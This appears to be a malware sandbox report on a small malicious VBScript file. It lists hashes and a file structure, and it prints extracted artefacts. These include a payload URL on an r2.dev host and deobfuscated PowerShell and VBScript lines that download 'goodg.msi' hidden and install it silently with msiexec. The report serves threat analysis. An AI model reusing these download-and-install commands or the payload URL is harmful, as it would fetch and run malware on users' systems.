Malicious
Malicious

c5baa116513ebc302cffc1e2ccf46ffd

VBScript
|
MD5: c5baa116513ebc302cffc1e2ccf46ffd
|
Size: 1.25 KB
|
text/vbscript

Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
c5baa116513ebc302cffc1e2ccf46ffd
Sha1
b0a203015708ca5bb442a8224379b7348b331c11
Sha256
4faad793253d32d0c6c7a5d0ec7526f546c5e980599b5e635ca40153fd782643
Sha384
295ab9fdc44fc06c17abd5ad227b2a0befd79149e574368fb2ea22520cc1a99cf7708da02b12824ff83fe3cc0a12b25f
Sha512
bb870387f8f01173a504b5dcb930643b3deeffe5b63628fa9fc13dbc8734b7a1c2326a39f562880d746b089a3ab1693f5511693dea893c1bb095ebfabb3c8011
SSDeep
24:1zdzPK2hNZUlNeltZ6BI56w1AZUMaFSOF:1zlXNZUlclD6BIbAZM
TLSH
3D219C8F6206B2549EB2521586C73D3CEA826F328E9070B45FE8854CCD21779B3AD497
File Structure
c5baa116513ebc302cffc1e2ccf46ffd
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
c5baa116513ebc302cffc1e2ccf46ffd.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Artefacts
Name
 Value
URLs in VB Code - #1

https://pub-0a6599d7d6394e379b6da3d6bfb5354a.r2.dev/goodg.msi
Deobfuscated PowerShell

"Invoke-WebRequest -Uri 'https://pub-0a6599d7d6394e379b6da3d6bfb5354a.r2.dev/goodg.msi' -OutFile '"
Deobfuscated PowerShell

"" Invoke-WebRequest -Uri "" & msiURL & "" -OutFile "" & msiPath & "" "" shell.Run downloadCmd, 0, True ' ==================================== ' Check if download succeeded ' ==================================== If Not fso.FileExists(msiPath) Then WScript.Quit End If ' ==================================== ' Install MSI with passive UI ' ==================================== installCmd = " "msiexec" "/i" "" & msiPath & "" "/passive" "/norestart shell.Run installCmd, 1, True"
c5baa116513ebc302cffc1e2ccf46ffd (1.25 KB)
File Structure
c5baa116513ebc302cffc1e2ccf46ffd
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
c5baa116513ebc302cffc1e2ccf46ffd.deobfuscated.vbs
Malicious
[Command #0]
Malicious
[PowerShell Command]
Malicious
[Deobfuscated PS]
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
URLs in VB Code - #1

https://pub-0a6599d7d6394e379b6da3d6bfb5354a.r2.dev/goodg.msi

c5baa116513ebc302cffc1e2ccf46ffd
Deobfuscated PowerShell

"Invoke-WebRequest -Uri 'https://pub-0a6599d7d6394e379b6da3d6bfb5354a.r2.dev/goodg.msi' -OutFile '"

Malicious

c5baa116513ebc302cffc1e2ccf46ffd > c5baa116513ebc302cffc1e2ccf46ffd.deobfuscated.vbs > [Command #0] > [PowerShell Command]
Deobfuscated PowerShell

"" Invoke-WebRequest -Uri "" & msiURL & "" -OutFile "" & msiPath & "" "" shell.Run downloadCmd, 0, True ' ==================================== ' Check if download succeeded ' ==================================== If Not fso.FileExists(msiPath) Then WScript.Quit End If ' ==================================== ' Install MSI with passive UI ' ==================================== installCmd = " "msiexec" "/i" "" & msiPath & "" "/passive" "/norestart shell.Run installCmd, 1, True"

Malicious

c5baa116513ebc302cffc1e2ccf46ffd > [PowerShell Command]
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙